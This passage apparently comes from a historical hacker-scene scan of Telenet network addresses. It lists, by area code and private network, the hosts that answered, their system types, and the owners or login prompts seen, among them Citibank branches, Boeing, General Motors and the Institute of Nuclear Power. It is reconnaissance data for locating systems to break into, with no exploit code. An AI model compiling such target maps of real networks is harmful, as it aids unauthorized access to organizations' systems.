   1053                      " 
   1054                      " 
   1055                      " 
   1056                      " 
   1057                      " 
   1058                      " 
   1059                      " 
   1060                      " 
   1061                      " 
   1062                      " 
   1063                      " 
   1064                      " 
   1065                      " 
   1066                      " 
   1067                      " 
   1068                      " 
   1069                      " 
   1075                      " 
   1076                      " 
   1077                      " 
   1078                      " 
   1079                      " 
 
 
202--WASHINGTON D.C.--ADRESSES SCANNED:  0-800 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   10      PRIME 
   31      VAX            News Machine 
$  36                     Network Sign-on Failed 
$  38                                " 
$  47      VAX 
*  48 
   49                     ENTER SYSTEM ID-- 
$  115                    PC Pursuit Dialer (300) 
$  116                    PC Pursuit Dialer (1200) 
$  117                    PC Pursuit Dialer (2400) 
*  123 
   132     VAX 
   133                    BA 
   134                    BA 
$  138     VAX            Gallaudet University 
$  139     DEC-10 
   141     PRIME          Telemail 
   142     PRIME          Telemail 
$  149 
   150     VAX            IDR 
*  151 
$  154                    Telenet Async to 3270 
$  155a                   Telenet Async to 3270 
$  156     VAX            American Psychiatric Assn 
*  157 
   161     UNIX           pac 
   162                    enter user id- 
$  165     HP-3000 
$  166     VAX 
   201                    Host Name: 
   202 
   203                    USER ID: 
   214     PRIME          SPA 
   217 
*  224 
*  230 
   232a 
$  235     PRIME          AMSC 
$  239     PRIME          AMSA 
*  241 
*  242 
*  243 
   245     AOS 
*  253 
*  254 
   255                    Morgan Stanley Network 
*  258 
*  260 
*  265 
*  266 
*  275 
*  276 
*  277 
$  278                    USER ID 
   308     PRIME 
   309     PRIME 
   312     PRIME 
*  330 
*  331 
*  332 
*  333 
*  334 
*  335 
   336     VAX            Congressional Quarterly 
   337     VAX                       " 
$  343     PRIME          OT 
   360     HP-3000 
   361 
   362 
*  364 
   365                    LEXIS/NEXIS 
   366                         " 
   367                         " 
*  371 
*  372 
*  373 
*  377 
$  390                    #Connect Requested 
$  391                           " 
*  403 
   430                    > 
*  433 
*  434 
   439                    Institute of Nuclear Power 
   440                              " 
   441                              " 
   442                    you are now connected 
   444                    Institute of Nuclear Power 
$  455 
   456 
   457 
   458 
$  462 
$  463 
   465 
   466 
   467 
   469 
   470 
   472 
$  473 
$  474 
$  475 
$  532     VAX 
$  535     AOS 
*  536 
*  652 
*  653 
*  654 
   693     HP-3000        MPE XL 
   709 
   710 
   711 
   712 
   810                    Telenet Async to 3270 
   811a                   Telenet Async to 3270 
   1180                   INVALID-SW-CHARACTERS 
   1181 
   1182                   NCR Comten 
 
 
 
203--CONNECTICUT--ADDRESSES SCANNED:  0-600 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   22      VM/370 
*  57 
$  60      HP-3000 
   66                     Login Please: 
   72      HP-3000 
   73a                    Password: 
   75      VAX 
$  105                    PC Pursuit Dialer (2400) 
$  120                    PC Pursuit Dialer (300) 
$  121                    PC Pursuit Dialer (1200) 
$  132     VAX 
*  135 
   136     PRIME          SYSA 
$  140                    ID 
   165                    Telekurs USA 
*  230 
*  231 
   304     HP-3000 
$  305                    Name? 
   307     HP-3000 
   310 
*  311 
*  331 
*  332 
*  501 
   602                    DESTINATION? 
 
 
205--ALABAMA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  30 
$  33                     ID 
*  34 
*  36 
$  73      PRIME          ALABMA 
*  137 
$  145     HP-3000 
 
 
206--WASHINGTON--ADDRESSES SCANNED:  0-1000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20      HP-3000 
$  30      HP-3000 
   32      VAX 
$  35                     DMOLNCT 
$  38      AOS 
$  40      PRIME          P6350 
$  42      AOS 
$  44      AOS 
$  50      AOS 
   53 
$  57      AOS 
   65      PRIME          OAD 
$  131     AOS 
$  132     VAX            ETA-RX 
$  135     AOS 
   137a                   Boeing msg switch 
$  138                    USSMSG2 
$  139     WANG VS        SECURITIES (FRS) 
$  141     AOS 
$  145     AOS 
$  146     PRIME          SEATLE 
$  147     AOS 
*  150 
$  160     AOS 
$  161     AOS 
   175a                   Boeing test 
$  205                    PC Pursuit Dialer (300) 
$  206                    PC Pursuit Dialer (1200) 
   207a 
$  208                    PC Pursuit Dialer (2400) 
$  250     WANG VS        SYSTEM ONE (FRC) 
$  251     WANG VS        SYSTEM TWO (TACOMA) 
$  338 
$  357     HP-3000 
$  430                    Environmental Ctrl Monitor 
   439                    bcs network 
   440     NOS            Boeing 
   447     NOS            Boeing 
   448                    bcs network 
   449     VM/370 
 
 
207--MAINE--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  51 
 
 
208--IDAHO--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  42      AOS 
$  43      AOS 
$  56      AOS 
$  131     AOS 
$  134     AOS 
$  135     AOS 
$  136     AOS 
$  137     AOS 
$  140     AOS 
$  141     AOS 
*  150 
$  152     AOS 
 
 
209--CALIFORNIA--ADDRESSES SCANNED: 0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31      AOS 
*  33 
*  34 
 
 
211--DUN & BRADSTREET--ADDRESSES SCANNED:  0-100/1000-2000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   1140 
   1142 
   1145                   Dun & Bradstreet Terminal 
   1190                      "               " 
   1195                      "               " 
   1240                      "               " 
   1244                      "               " 
   1290                      "               " 
   1291                      "               " 
   1295                      "               " 
   1390                      "               " 
   1391                      "               " 
   1392    PRIME 
   1396                   Dun & Bradstreet Terminal 
   1490    PRIME 
   1491                   Dun & Bradstreet Terminal 
   1492                      "               " 
   1493                      "               " 
   1494                      "               " 
   1540                      "               " 
   1591                      "               " 
   1594                      "               " 
   1594                      "               " 
   1640                      "               " 
   1690                      "               " 
   1693                      "               " 
   2140                   CCS Online 
   2141                   CCS Online 
   2142    VM/370 
   2143                   sls1 
   2145    VM/370 
   2150    PRIME 
   2151                   fsd2 
   2152                   socy 
   2153                   css3 
   2154                   CCS Online 
   2155                   CCS Online 
   2156                   ecl1 
   2157                   tbs1 
   2158                   dbc1 
   2159                   exx2 
   2160                   nyt2 
   2162                   css1 
   2163                   css2 
   2164                   bofa 
   2165                   soc1 
   2166                   soc2 
   2167                   socx 
   2168                   soc3 
   2169                   soca 
   2170                   socb 
   2171                   socc 
   2172                   dnb1 
   2173                   mdy2 
   2174                   koln 
   2175                   fsd1 
   2176                   ptts 
   2177                   has1 
   2178                   has3 
   2179                   levi 
   2180                   nyt1 
   2181                   pers 
   2182                   risk 
   2183                   usc1 
   2184                   cids 
   2185                   zyt1 
   2186                   inel 
   2187                   fop1 
   2188                   kbm1 
   2189                   kbm2 
   2190                   kbm3 
   2191                   kbm4 
   2192                   sls1 
   2193                   mdy1 
   2194                   ira1 
   2195                   ira2 
   2196                   why1 
   2197                   ndg1 
   2198                   lit1 
   2450    PRIME 
   3141    IDC/370 
   6140                   OAG 
 
 
212--NYC-BRONX & MANHATTAN--ADDRESSES SCANNED:  0-1200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  11                     PLEASE BEGIN 
$  28                     PC Pursuit Dialer (2400) 
   31      VM/370 
*  34 
   39      PRIME          IDDD 
   40                     PLEASE ENTER /LOGIN 
*  48 
$  52      PRIME          SYSA 
$  73                     USS00 
   74      VM/370 
   79                     ENTER ID: 
*  85 
*  86 
$  99      HP-3000 
   105                    ****INVALID SIGNON 
   106                             " 
   108                             " 
   109                             " 
   110                             " 
   112     VM/370 
$  124     VAX 
   131     VM/370 
*  132 
*  135 
   137     PRIME          NY60 
   141     PRIME          Telemail 
   142     PRIME             " 
   145                    ENTER ACCESS ID: 
   146                           " 
*  149 
   152     VAX 
$  154     PRIME          NYORK 
*  157 
*  158 
*  160 
$  167     PRIME          MPISBS 
   170                    Information Services Net 
   172                               " 
$  173                    Brown Brothers 
   174                    Information Services Net 
*  197 
   200                    ENTER IDENTIFICATION: 
   216                    Bank of New York 
   226                    USER ID 
   231     VM/370 
$  235     PRIME          JAMACA 
   237                    TIMEINC NYK 
   238 
   246     VAX            UniTraC 
   248     PRIME          RYE 
*  249 
*  255 
*  256 
$  257                    BANAMEX Data Network 
   258                    ENTER ACCESS ID: 
$  259     VAX            BTNET 
   260                    Bankers Trust Online 
   263     VAX 
   266     UNIX 
   267     UNIX 
$  271                    : 
*  273 
$  274                    INVALID INPUT 
   275                    Bankers Trust Online 
*  278 
*  279 
*  306 
$  315                    PC Pursuit Dialer (1200) 
   320                    ENTER IDENTIFICATION 
   321                            " 
$  322                    COMMAND UNRECOGNIZED 
*  326 
   328                    ENTER IDENTIFICATION 
*  336 
   345     PRIME          NMSG 
$  350                    VTAM002 
$  351                       " 
*  352 
*  354 
   359 
   376                    Bankers Trust Online 
   377                              " 
   378                              " 
   379                              " 
*  432 
   433     VAX 
   443     VAX 
   444     PRIME          EMCO 
$  446     VAX 
   449     VM/370 
   446 
   468 
   479                    Invalid Login Attempt 
*  496 
*  497 
   500                    enter a for astra 
   501                            " 
   502                            " 
   503                            " 
   504                            " 
   505                            " 
   506                            " 
   507                            " 
   535                    TIMEINC NYK 
   536                         " 
   537                         " 
   539     VOS 
$  540     VAX            Client Videotext Server 
$  541     VAX                       " 
   544                    TIMEINC NYK 
   545                         " 
$  546                    APLICACO: 
$  548     PRIME          TREPP1 
   552                    TIMEINC NYK 
   553                         " 
   554                         " 
   566                         " 
   567                         " 
*  576 
   577                    Telenet Async to 3270 
   579a                   Telenet Async to 3270 
   580 
   615                    Shearson Lehman Hutton 
   631 
   649     WANG VS 
   693 
   702 
   713     PRIME          NY60 
$  726     VAX 
$  737                    FINLAY FINE JEWELRY 
$  752                            " 
$  753                            " 
   755     VM/370 
*  768 
   935 
*  970 
*  971 
*  972 
*  973 
*  974 
*  975 
*  976 
*  977 
*  978 
*  979 
   981     UNIX 
*  1009 
*  1031 
   1034 
   1036 
   1039 
*  1040 
$  1045    HP-3000 
   1049                   MHP201A 
   1052    PRIME          FTC0 
   1069    VAX 
$  1071    GS/1 
$  1072    GS/1 
*  1074 
*  1075 
 
 
213--CALIFORNIA--ADDRESSES SCANNED:  0-1200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   21      PRIME          C6 
   22      PRIME          D6 
*  23 
   24                     Marketron Research 
   25 
   33 
   35                     Marketron Research 
   40      PRIME          A6 
*  41 
   44 
*  45 
   51 
$  52      PRIME          AIS8 
*  54 
*  57 
   58      PRIME          ACSI 
   79      UNIX           Interactive Systems 
   88      PRIME          MSCOST 
$  92a 
   102     PRIME          TRWE.A 
$  103                    PC Pursuit Dialer (1200) 
   105     PRIME          SWOP 
$  113 
   118     VAX 
   121     PRIME          SWWE1 
   122     PRIME          TRNGW2 
   123     PRIME          SWWA1 
   124     PRIME          CS.CAR 
   125     PRIME          SWLAR 
   126     HP-3000 
   128     PRIME          CS.SD 
$  143     HP-3000        ANA Trading Corporation 
*  144 
   151     PRIME          CSSWR1 
   153     PRIME          SWLA1 
   154     PRIME          SWWCR 
   155     PRIME          CS.LA 
$  166                    BW/IP International Inc. 
*  169 
   172a 
$  176     AOS 
*  178 
   199     PRIME          C6 
   219 
   220                    Telenet Async to 3270 
   221a                   Telenet Async to 3270 
   227a 
*  249 
*  250 
*  252 
*  255 
*  256 
*  257 
   260                    Telenet Async to 3270 
   261a                   Telenet Async to 3270 
*  336 
$  338     HP-3000 
   340     PRIME          TRNGW 
   342     PRIME          SWLB1 
   347 
*  361 
$  369     PRIME          LA 
*  371 
   374                    Telenet Async to 3270 
   375a                   Telenet Async to 3270 
$  412                    PC Pursuit Dialer (1200) 
$  413                    PC Pursuit Dialer (2400) 
*  464 
   485a 
   488a 
*  1041 
*  1043 
   1403                   COMPUTAX 
   1404                   COMPUTAX 
 
 
214--TEXAS--ADDRESSES SCANNED:  0-1200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   17                     Teleview 
   20                     US Sprint 
   21                     Teleview 
*  22 
   42                     DNA Online 
*  48 
*  53 
   60      HP-3000 
$  62      PRIME          TRUSWL 
*  65 
   71      PRIME          UCCC 
   76      CYBER          PCC 
   77      PRIME          UCCC 
   94a 
$  117                    PC Pursuit Dialer (300) 
$  118                    PC Pursuit Dialer (1200) 
   120 
   131     HP-3000 
   152     HP-3000 
   156     HP-3000 
*  157 
   159a                   C@ 
   160a                   C@ 
   168     HP-3000 
   169     HP-3000 
   176a    PRIME          UCCC 
   177                    HL053-TRAN 
   231 
   233 
   236a 
   240     VAX            HQAAFES 
   242                    TACL 1> 
*  250 
*  252 
*  253 
*  254 
*  255 
*  256 
*  257 
*  258 
*  259 
*  261 
*  262 
*  263 
*  264 
*  265 
*  266 
*  267 
*  268 
*  269 
*  270 
*  279 
   341     PRIME          BNW 
   342     PRIME          GCAD.. 
*  373 
*  530 
*  531 
*  532 
*  533 
*  534 
*  535 
*  536 
*  537 
*  538 
*  539 
   607     HP-3000 
 
 
215--PENNSYLVANIA--ADDRESSES SCANNED:  0-400 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  5                      PC Pursuit Dialer (300) 
$  22                     PC Pursuit Dialer (2400) 
*  30 
$  32      AOS 
$  35                     IMS AMERICA 
   40                     VU/TEXT 
$  45                     IMS AMERICA 
   49                     Telebase Systems 
*  50 
*  54 
*  60 
   66                     Newsnet 
   74 
   92a 
$  112                    PC Pursuit Dialer (1200) 
   121                    Towers Perrin Online 
*  132 
   135                    VU/TEXT 
   136                    DSS::15B1 
   137 
   140                    VU/TEXT 
$  148                    Weston's Computer Center 
$  156                    Telenet Async to 3270 
$  157a                   Telener Async to 3270 
$  234 
   235     HP-3000 
   262                    Data Mail 
   264                    ? 
   265                    " 
   266                    " 
   267                    " 
   268                    " 
   269     PRIME 
*  350 
*  360 
$  361     HP-3000 
 
 
216--OHIO--ADDRESSES SCANNED:  0-400 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
$  30                     MRI CICS H0C3 
*  31 
$  32                     MRI CICS H0C3 
$  34      PRIME          SH.US 
$  35 
*  51 
*  55 
*  57 
*  59 
$  60                     MHP201A 
   66                     Newsnet 
$  74      HP-3000 
   109a 
*  115 
$  120                    PC Pursuit Dialer (2400) 
*  125 
*  134 
*  135 
*  138 
$  144                    U#= 
   163 
*  178 
 
 
217--ILLINIOS--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   25      UNIX           University of Illinois 
   26      UNIX           University of Illinois 
$  35      VAX            NCSA VMSA 
$  39                     ID 
$  40 
$  41      PRIME          SPRFLD 
 
 
218--MINNESOTA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  38      AOS 
$  39      AOS 
*  40 
$  42      AOS 
$  45      AOS 
$  56      AOS 
$  142     AOS 
$  157     AOS 
 
 
219--INDIANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   4       PRIME          NODE.1 
   5       PRIME          NODE.2 
   6       PRIME          NODE.4 
   7       PRIME          NODE.5 
   8       PRIME          NODE.8 
   9                      N1127p3  ENTER GROUP NAME> 
   10                     Lincoln National Corp. 
*  50 
 
 
222--UNKNOWN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   100     PRIME 
   301a                   C@ 
   401a                   C@ 
 
 
223--CITIBANK--ADDRESSES SCANNED:  0-300/1000-3000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  1 
$  2       VAX            CRIS 
   10      PRIME 
*  15 
   19      HP-3000 
   26      GS/1           IBISM Electronic Village 
   30      VAX            Citi Treasury Products 
   31                     INVALID FORMAT 
   32                     enter a for astra 
*  34 
   35      VAX            Citi Treasury Products 
   39                     HRINFO NETWORK 
   40      VAX            Global Report 
   46      CICS           PPD Communications Network 
   47      CICS           PPD Connunications Network 
   48                     Citibank NY  port CBN2 
   49                     Online Manual 
   50      PRIME 
   55      PRIME          WINMIS 
   61      VAX            Global Report 
   63      VAX            Global Report 
   65                     System/88 
$  68                     Citimail II 
   70      VAX            FIG ADMIN CLUSTER 
   71                     Enter Translator Number 
   91      VAX 
$  92                     Citinet 
$  94 
$  95                     <<ENTER PASSWORD>> 
$  96                     <<ENTER PASSWORD>> 
   97                     Quotdial 
   98      VAX            CMA1 
$  100     VAX 
$  103                    <<ENTER PASSWORD>> 
$  104     VAX 
   175                    enter a for astra 
$  176     VAX            PBGNY 
   178     VAX            Citibank VAXC 
   179     VAX            Citibank VAXC 
$  180     Decserver 
$  181     Decserver 
$  182     Decserver 
*  183 
*  184 
*  185 
*  186 
$  187     Decserver 
$  189     Decserver 
   193     PRIME 
$  199     RSX-11 
   201                    C/C/M 
   202                    C/C/M 
   203                    C/C/M 
   204                    C/C/M 
   208                    C/C/M 
   260     VAX 
*  1000 
 
 
224--CITIBANK--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   2       VAX            Global Report 
   5 
   7                      Citibank Test 
   9       VAX 
   13 
   16                     PLEASE SIGN ON 
   17                     Citibanking Hong Kong 
   22 
   24      Decserver 
   26                     Mexico Babymail 
   27      Decserver 
   28      Decserver 
   36                     Citibank Mexico 
   47                     PPD Communications Network 
   51                                " 
   52                     Citibank Mexico 
   57      VAX 
   58                     Citibank Venesuela 
   59                     Citibank Quito 
   60                     Citibank CBK3 
   61                     Citibank Sidney 
   62                     Citibank Jakarta 
   63                     Citibank Manila 
   64                     Citibank New Zealand 
   65                     Citibank Singapore 
   66 
   67 
   68                     Argentina Mail 
   71                     ENTER TRANSACTION ID: 
   73      Decserver 
   74                     CHANNEL 03/104 
   76                     Cititrak BBS 
   78                     Citibank Hong Kong 
   79                     Citibank New York 
   81                     Citibank Tokyo 
   82                     Citibank Seoul 
   83                     Citibank New York 
   84                     World Corp. Group 
   85                     Citibank Hong kong 
   86                     Citibank Singapore 
   87      Decserver 
   88                     Citibank Taipei 
   89                     Citibank ICC 
   90      WANG VS        BANCO INTERNAL 
   91      PRIME 
   92 
   93 
   94      IBM 3270       CSGCOPRO 
   97                     CitiMail-Asia Pacific 
   98                     C/C/M 
   100                    CitiSwitch, New York 
   101                    BMS==> 
   102                    CitiSwitch Hong Kong 
   103                    BRAZILMAIL 
   104                    BMS==> 
   105                    Type . 
   106                    Citibank Panama 
   107 
   108                    C/C/M 
   109                    Citibank Baharain 
   110                    Citibank Puerto Rico 
   111 
   113                    Citibank London 
   114 
   115 
   117                    Citibank Hong Kong 
   118                    NEWNET BS 
   119     Decserver 
   121                    NEWNET BS 
   122     VAX            Global Report 
   125                    ENTER TRANSACTION ID: 
   127                    Citibank Jakarta 
   128     PRIME 
   129     VAX            CitiTreasury Products 
   130     VAX                    " 
   131                    Citibank New York 
   134 
   137     HP-3000 
   138 
   139     VAX            I.B.F.S. 
   140                       " 
   141     HP-3000 
   145     PRIME 
   150                    Citibank New Jersey 
   151 
   154     PRIME 
   160 
   161     VAX            FIG ADMIN 
   162     PRIME 
   163     PRIME 
   164     PRIME          WINMIS 
   165     GS/1           IBISM Elctronic Village 
   166     VAX            CitiTreasury Products 
   167     VAX                     " 
   168     VAX            Global Report 
   170                    Electronic Cash Manager 
   173                    HELP Online User Manager 
   174     PRIME 
   175                    enter a for astra 
   176     Decserver 
   177 
   178     VAX            CRIS 
   179                    Citinet 
   180                    ENTER QUOTDIAL ID: 
   181                    Citimail II N. America 
   183     PRIME 
   187     Decserver 
   188     GS/1           Cititrust WIN 
   190     HP-3000 
   191                    ENTER TYPE NUMBER 
   192     HP-3000 
   193     HP-3000 
   196     VAX            CMA1 
   197                    HRINFO NETWORK 
   199                    CHANNEL 08/017 
   200                    Citibank Baharain 
   201                    CitiMail-Asia Pacific 
   202                            " 
   203                    Citibank Hong Kong 
   204                    LAGB LATINMAIL 
   205 
   207                    CitiBanking SUC.MONTEVIDEO 
   213 
   217 
   219                    Citibank Stockholm 
   221 
   222     XENIX 
   223     VAX            Global Report 
   224     PRIME 
   229     VAX            Global Report 
   231 
   501     PRIME          ATG 
   506     IBM            Citibank Hong Kong 
 
 
229--GENERAL MOTORS--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   113                    DCIPC 
   114                    %@CTVVAUd@dUYECVGUIied 
   118                       "           " 
   137     VAX 
   152     VAX 
   171                    (Channel b.h128.001) 
   172                       "           " 
   176     NOS 
   177                    (Channel b.h101.001) 
   178                    (Channel b.h128.001) 
   179                       "           " 
   181                    USER NUMBER-- 
   183                    USER NUMBER-- 
   184                    Division: 
   185 
   187     DEC20 
   219     VM/370 
   220 
   226     VAX 
   310     PRIME 
   311                    IUeASID@CVTTAUD@bhUcAg 
 
 
301--NARYLAND--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   20                     PLEASE ENTER /LOGIN 
*  21 
   24                     The Source 
   26                     DNAMD1 Online 
   28                     The Source 
   31      PRIME          NUSA 
   33      VOS            United Communications Corp 
   38                     The Source 
*  39 
*  43 
   45                     RNN/NGW 
*  46 
   47                     The Source 
   48                     The Source 
   49                     The Source 
$  52      PRIME 
   56                     RNN/NGW 
   57                     RNN/NGW 
   58      PRIME          CDA Online Services 
*  60a 
*  61a 
$  63      PRIME          PINET 
$  65      PRIME          APHISB 
   74                     (I)nt (D)atapac (T)elenet 
*  77 
*  78 
   100     VOS            United Communications Corp 
   102     CYBER          Arbitron 
   103       "               " 
   104       "               " 
   105       "               " 
   106       "               " 
   107       "               " 
   108       "               " 
   109       "               " 
   110       "               " 
   111       "               " 
   112       "               " 
   113       "               " 
   114       "               " 
   115       "               " 
   116       "               " 
$  125     VAX 
   132                    ElHill 3 
   140     VAX 
   141                    USER ID 
$  150     VAX 
   156                    The Source 
   157                    The Source 
   158                    The Source 
   159                    The Source 
   162                    The Source 
*  165 
$  167     VAX            Manger Support System 
$  68      VAX 
   170     VOS            United Communications Corp 
$  173                    ID 
$  175                    ID 
$  176     HP-3000 
   178     CYBER          Arbitron 
$  243     PRIME 
$  245     PRIME 
$  246     PRIME 
$  247     PRIME 
   249     VAX            Tamsco 
   301     PRIME          Primecom Network 
   302       "               "        " 
   303       "               "        " 
   307     PRIME 
   330     PRIME          Primecom Network 
   331       "               "        " 
   332       "               "        " 
   333       "               "        " 
   334       "               "        " 
   335       "               "        " 
   336     VAX 
   337                    Dialcom MHS 
   341     PRIME          Primecom Network 
   342       "               "        " 
   343       "               "        " 
   344       "               "        " 
   345       "               "        " 
   346       "               "        " 
   350       "               "        " 
   351       "               "        " 
   352       "               "        " 
   353       "               "        " 
   354       "               "        " 
   356       "               "        " 
   357       "               "        " 
   358       "               "        " 
   361       "               "        " 
   363       "               "        " 
   364       "               "        " 
   390       "               "        " 
   391       "               "        " 
   392       "               "        " 
   393       "               "        " 
   394       "               "        " 
   396       "               "        " 
   398       "               "        " 
   399       "               "        " 
   408                    The Source 
   430                    The Source 
   435                    The Source 
$  440                    INVALID-SW-CHARS 
*  441 
*  442 
*  443 
*  444 
*  445 
*  446 
*  447 
*  448 
*  449 
*  450 
*  451 
*  452 
$  453     VAX 
$  454     PRIME          FRED 
   1001                   Campus 2000 
   1002                   Telecom Gold 
   1004                   Telecom Gold 
   1017                   Rev.19 
   1018                   Telecom Gold 
   1040    VAX            British Telecom 
   1041     "                   " 
   1047     "                   " 
   1049     "                   " 
   1050     "                   " 
   1051     "                   " 
   1052     "                   " 
   1053     "                   " 
   1054     "                   " 
   1055     "                   " 
   1057     "                   " 
   1058     "                   " 
   1060    UNIX           Telecom Gold 
   1061     "                   " 
   1068     "                   " 
   1069     "                   " 
   1072                   Telecom Gold 
   1073                         " 
   1074                         " 
   1075                         " 
   1076                         " 
   1077                         " 
   1078                         " 
   1079                         " 
   1080                         " 
   1081                         " 
   1082                         " 
   1083                         " 
   1084                         " 
   1085                         " 
   1086                         " 
   1087                         " 
   1088                         " 
   1089                         " 
   1090                         " 
   1200a                        " 
   2030                   ID 
   2031                    " 
   2032                    " 
   2033                    " 
 
 
302--DELAWARE--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  31                     ID 
*  32 
$  41                     (Tymnet clone) 
 
 
303-COLORADO--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   7                      NCAR 
   8                      NCAR 
$  21                     PC Pursuit Dialer (2400) 
   38      PRIME          SL 
$  50      AOS 
$  52      PRIME          DWRC 
$  54      AOS 
$  57      PRIME          DENVER 
$  60      AOS 
*  64 
*  65 
$  66      AOS 
$  68      AOS 
$  69      AOS 
$  78      AOS 
   100                    enter switch characters 
$  114                    PC Pursuit Dialer (300) 
$  115                    PC Pursuit Dialer (1200) 
   120     PRIME          SAMSON 
$  130     AOS 
   131                    Petroleum Info Network 
$  138     AOS 
   140                    X29 Password: 
$  145     AOS 
$  146     AOS 
$  149                    ID 
*  152 
$  154     AOS 
$  155     AOS 
$  156     AOS 
$  157     AOS 
$  158     AOS 
$  159     AOS 
$  168     AOS 
$  169     AOS 
$  172     AOS 
$  176     AOS 
$  177     AOS 
*  179 
*  200 
$  231     AOS 
$  239     AOS 
*  244 
*  250 
$  253     AOS 
*  256 
$  257     AOS 
*  266 
   314 
   335     PRIME          UDEN01 
$  342     HP-3000 
   350     VAX 
$  353     AOS 
$  354     AOS 
$  355     AOS 
$  356     AOS 
$  434     AOS 
*  463 
$  470     AOS 
 
 
304--WEST VIRGINIA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31      AOS 
$  32                     ID 
*  34 
*  41 
   100                    WVNET 
   130                    WVNET 
 
 
305--FLORIDA--ADDRESSES SCANNED:  0-900 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   4                      Martin Marietta 
   20 
   22      HP-3000 
   35                     ENTER SWITCH CHARACTERS 
*  51 
*  52 
*  56 
   63      HP-3000 
*  67 
*  68 
*  69 
   73      HP-3000 
$  120                    PC Pursuit Dialer (300) 
$  121                    PC Pursuit Dialer (1200) 
$  122                    PC Pursuit Dialer (2400) 
   129     HP-3000 
*  135 
   136 
   137 
   138     HP-3000 
   140 
   148     VAX 
   156     VAX            EVF 
   159                    VU/TEXT 
*  235 
*  236 
   239     VM/370 
$  240     HP-3000 
   248     VAX 
   255     VAX 
*  262 
*  263 
$  268 
   278                    PACKET/74 
   330a 
*  337 
$  338     VAX            AIM 
$  345     PRIME          MIAMI 
*  350 
*  351 
*  360 
*  361 
   365                    Martin Marietta 
$  370                    No access to this DTE 
   371     VAX            (In Spanish) 
*  433 
   570 
   590 
   623                    Telenet Async to 3270 
   644 
 
 
312--ILLINOIS--ADDRESSES SCANNED:  0-1200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  24                     PC Pursuit Dialer (2400) 
   34                     Your entry is incorrect 
$  35                     VTAM/TSO 
*  37 
   41                     Your entry is incorrect 
   42                     # 
   43                     # 
   46                     SYSTEM SECURITY STANDARDS 
   63                     PEOPLE/LINK 
$  64                     Purdue ISN 
$  65                     COMMAND UNRECOGNIZED 
   70                     PEOPLE/LINK 
*  71 
*  77 
*  78 
   101a 
   108a 
   121                    enter system id-- 
   131     VM/370 
$  133 
   135                    PEOPLE/LINK 
   142     HP-3000 
$  146     HP-3000 
$  147                    ONLINE 
   150                    Please enter SUBSCRIBERID 
$  158     HP-3000 
   159                    Please enter SUBSCRIBERID 
   160                    PASSWORD 
   161                       " 
   162                       " 
   163                       " 
$  166                    ONLINE 
$  170     VAX            SKMIC4 
   219                    enter system id-- 
   222                    PASSWORD 
   227                    PASSWORD 
$  231                    USSMSG02 
   233                    PASSWORD 
   235                    PASSWORD 
*  245 
   247 
*  253 
*  254 
$  255                    Enter host access code: 
   256                    Please LOGIN 
   258                    ID: 
*  263 
   289                    Baxter ASAP System 
   300a    WANG VS        SREA 
   301a       "            " 
   302a       "            " 
   303a       "            " 
   304a       "            " 
   305a       "            " 
   306a       "            " 
   307a       "            " 
   308a       "            " 
   309a       "            " 
   310a       "            " 
   311a       "            " 
   312a       "            " 
   313a       "            " 
   314a       "            " 
   315a       "            " 
   316a       "            " 
   317a       "            " 
   318a       "            " 
   319a       "            " 
*  338 
